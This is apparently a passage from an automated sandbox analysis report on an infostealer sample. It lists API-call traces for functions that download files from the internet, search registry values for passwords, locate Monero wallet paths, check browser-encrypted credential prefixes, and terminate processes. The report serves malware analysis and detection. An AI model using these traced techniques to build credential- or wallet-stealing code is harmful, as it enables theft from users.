                                  • Opcode ID: 4c8f0d060030977f2c6b74f16ecad6092dbccfdeda1b71ad1aacdb4b41be40cb
                                  • Instruction ID: a3c604eead77efa309a0489e2ad1266e97a7b35ad5bad74904234da8a9340881
                                  • Opcode Fuzzy Hash: 4c8f0d060030977f2c6b74f16ecad6092dbccfdeda1b71ad1aacdb4b41be40cb
                                  • Instruction Fuzzy Hash: F4A18030A012859FCB24EF6ADD49A9FBBB4FF46304F548069E409DB262DB71DC52CB91
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F8263
                                  • lstrlenA.KERNEL32(00000000), ref: 008F829C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F82D3
                                  • lstrlenA.KERNEL32(00000000), ref: 008F82F0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8327
                                  • lstrlenA.KERNEL32(00000000), ref: 008F8344
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F837B
                                  • lstrlenA.KERNEL32(00000000), ref: 008F8398
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F83C7
                                  • lstrlenA.KERNEL32(00000000), ref: 008F83E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8410
                                  • strtok_s.MSVCRT ref: 008F842A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$strtok_s
                                  • String ID:
                                  • API String ID: 2211830134-0
                                  • Opcode ID: 61217740d8f483c0e1cc30f0b65226990c3bbd6f3151f6f85dbcd68ebcb9b7fb
                                  • Instruction ID: 0c2987d22da63240c06a29f9eca87f6c29fe0a6e1ddb9efdec38291f707067b4
                                  • Opcode Fuzzy Hash: 61217740d8f483c0e1cc30f0b65226990c3bbd6f3151f6f85dbcd68ebcb9b7fb
                                  • Instruction Fuzzy Hash: 83513971900617EBDB14AF79D848AAABBA8FF04310F108524ED06EB245DF30ED61CBE0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6A3F
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E6A6C
                                  • StrCmpCA.SHLWAPI(?,010CD6E8), ref: 008E6A8A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008E6AAA
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008E6AC8
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6AE1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008E6B06
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6B30
                                  • CloseHandle.KERNEL32(00000000), ref: 008E6B50
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6B57
                                  • InternetCloseHandle.WININET(?), ref: 008E6B61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 82bfd2224a31389ba1ac50aaaf2333501e19005cd6a7e964c530ef727796db4a
                                  • Instruction ID: 84586076f56e2583c8b0296a1fd1248a030e54cf47bc9442c712f9bf3e4f31c7
                                  • Opcode Fuzzy Hash: 82bfd2224a31389ba1ac50aaaf2333501e19005cd6a7e964c530ef727796db4a
                                  • Instruction Fuzzy Hash: C4419071A40255ABDB20DF65DC89FEE77B8FB44740F508464FA05E7180EF70AE418BA4
                                  APIs
                                    • Part of subcall function 008E7710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7745
                                    • Part of subcall function 008E7710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E778A
                                    • Part of subcall function 008E7710: strlen.MSVCRT ref: 008E77BE
                                    • Part of subcall function 008E7710: StrStrA.SHLWAPI(?,Password), ref: 008E77F8
                                    • Part of subcall function 008E7710: strcpy_s.MSVCRT ref: 008E7821
                                    • Part of subcall function 008E7710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E782C
                                    • Part of subcall function 008E7710: HeapFree.KERNEL32(00000000), ref: 008E7833
                                    • Part of subcall function 008E7710: strlen.MSVCRT ref: 008E7840
                                  • lstrcatA.KERNEL32(00000000,0091508C), ref: 008E79D0
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E79FD
                                  • lstrcatA.KERNEL32(00000000, : ), ref: 008E7A0F
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E7A30
                                  • wsprintfA.USER32 ref: 008E7A50
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E7A79
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008E7A87
                                  • lstrcatA.KERNEL32(00000000,0091508C), ref: 008E7AA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                  • String ID: :
                                  • API String ID: 2460923012-3653984579
                                  • Opcode ID: 44704b0974c1dfe3952237ea6f9db651ad47a4603b178d48c1e84d9c9acb9e9d
                                  • Instruction ID: 9c076f9971ab6e66dfc9dd64e313ad35002e6cdcd8467aa2a7ca4722b7ef8262
                                  • Opcode Fuzzy Hash: 44704b0974c1dfe3952237ea6f9db651ad47a4603b178d48c1e84d9c9acb9e9d
                                  • Instruction Fuzzy Hash: DB317576A04298EFCB10DBA9DC44DEFBB79FB89714F658529E50AD3200DF70AA41C790
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F8105
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0090093B), ref: 008F814B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F817A
                                  • StrCmpCA.SHLWAPI(00000000,009151F4,?,?,?,?,?,0090093B), ref: 008F8192
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0090093B), ref: 008F81D0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F81FF
                                  • strtok_s.MSVCRT ref: 008F820F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenstrtok_s
                                  • String ID: fplugins
                                  • API String ID: 3280532728-38756186
                                  • Opcode ID: a15a173cdf3535585c30a90689e3c6ca8e9ba81371e49b840409ea5990037004
                                  • Instruction ID: 4a521c59cce4bb138f6d869237bd709f369478ac24bfd6152f0b5c20dca00265
                                  • Opcode Fuzzy Hash: a15a173cdf3535585c30a90689e3c6ca8e9ba81371e49b840409ea5990037004
                                  • Instruction Fuzzy Hash: 50417B75A0020AEFCB21DF78D948BAABBB8FF44700F118119E959D7244EF34E981CB90
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 008E9E64
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 008E9EA2
                                  • memset.MSVCRT ref: 008E9ECF
                                  • LocalAlloc.KERNEL32(00000040), ref: 008E9F07
                                    • Part of subcall function 00907210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090722E
                                  • lstrcpy.KERNEL32(00000000,00915200), ref: 008EA012
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocalmemset
                                  • String ID: @$v10$v20
                                  • API String ID: 3420379846-278772428
                                  • Opcode ID: 7c738111478b917c8716728451f9065b185eb39fbe3503af6903f6f023707fd1
                                  • Instruction ID: bb042877c84d61143b4819b174c65b384bc8f24a776e995bee68ee905c375374
                                  • Opcode Fuzzy Hash: 7c738111478b917c8716728451f9065b185eb39fbe3503af6903f6f023707fd1
                                  • Instruction Fuzzy Hash: 3351B431A00289ABDB10EFAACC45BDE7BA8FF42314F054425F959EB252DBB0ED4587D1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1015
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E101C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1039
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1053
                                  • RegCloseKey.ADVAPI32(?), ref: 008E105D
                                  Strings
                                  • SOFTWARE\monero-project\monero-core, xrefs: 008E102F
                                  • wallet_path, xrefs: 008E104D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3466090806-4244082812
                                  • Opcode ID: 228372d5a65e615134154039c25abbf4d8cfd345560fd596ec461e94df0dce32
                                  • Instruction ID: ef8592f86f7e24456024dec34d9a4b9566374b6b0adac07c1f03dc0dfe18ac2f
                                  • Opcode Fuzzy Hash: 228372d5a65e615134154039c25abbf4d8cfd345560fd596ec461e94df0dce32
                                  • Instruction Fuzzy Hash: 92F03079B40349BBD7109BA1AC4DFEB7B7CEB44715F104154FE09E3281DAB05A4487A1
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904779
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00904789
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0090479B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009047BC
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009047CB
                                  • CloseHandle.KERNEL32(00000000), ref: 009047D2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 009047E0
                                  • CloseHandle.KERNEL32(00000000), ref: 009047EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                                  • Instruction ID: 22a65c44429c8edbf498f895e436321e0ae4369ef98bac4d7b8785a310be91d8
                                  • Opcode Fuzzy Hash: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                                  • Instruction Fuzzy Hash: 6301B1B1601214AFE7205B209C8DFEA77BCEB08751F404590FA09D20C0EF708E908BA1
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 008E717E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008E71B9
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E71C0
                                  • memcpy.MSVCRT(00000000,?), ref: 008E71ED
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008E7203
                                  • HeapFree.KERNEL32(00000000), ref: 008E720A
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008E7269
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                  • String ID:
                                  • API String ID: 1745114167-0
                                  • Opcode ID: 0d97a1a1f8005e1f783ed1eb7cd4b3bc9ff20220ceb89c338efc1ac797cf3e2c
                                  • Instruction ID: 542fbda80988cac5323abba91a706afa93f78d1dbfe4594cce06161d98a3fb88
                                  • Opcode Fuzzy Hash: 0d97a1a1f8005e1f783ed1eb7cd4b3bc9ff20220ceb89c338efc1ac797cf3e2c
